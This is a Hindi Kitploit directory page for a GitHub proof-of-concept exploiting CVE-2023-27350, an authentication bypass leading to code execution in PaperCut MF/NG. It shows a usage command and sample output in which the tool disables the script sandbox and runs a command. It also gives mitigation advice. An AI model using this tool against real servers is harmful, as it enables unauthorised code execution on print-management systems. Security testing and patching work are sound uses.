Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27350 — Papercut कमजोरी, प्रभावित संस्करण PaperCut MF या NG संस्करण 8.0 या बाद के (पैच किए गए संस्करणों को छोड़कर) सभी OS प्लेटफार्मों पर हैं। | Kitploit
उपकरण/GitHubGitHub/royall-researchers/cve-2023-27350
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Papercut कमजोरी, प्रभावित संस्करण PaperCut MF या NG संस्करण 8.0 या बाद के (पैच किए गए संस्करणों को छोड़कर) सभी OS प्लेटफार्मों पर हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-27350

CVE-2023-27350 को प्रभावित करने वाला POC PaperCut MF/NG

##प्रभावित संस्करण 'PaperCut MF या NG संस्करण 8.0 या उसके बाद (पैच किए गए संस्करणों को छोड़कर) सभी OS प्लेटफ़ॉर्म पर।'

सारांश

यह POC एक प्रमाणीकरण बाईपास भेद्यता का उपयोग करता है जिसे अंतर्निहित स्क्रिप्टिंग कार्यक्षमता के दुरुपयोग के साथ जोड़कर कोड निष्पादित किया जाता है।

उपयोग

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

शमन उपाय

नवीनतम संस्करण में अपडेट करें या PaperCut सुरक्षा सलाहकार के निर्देशों का पालन करके शमन करें।

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

अस्वीकरण

यह सॉफ़्टवेयर विशुद्ध रूप से अकादमिक अनुसंधान और प्रभावी रक्षा तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उद्देश्य सिस्टम पर हमला करने के लिए उपयोग करना नहीं है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें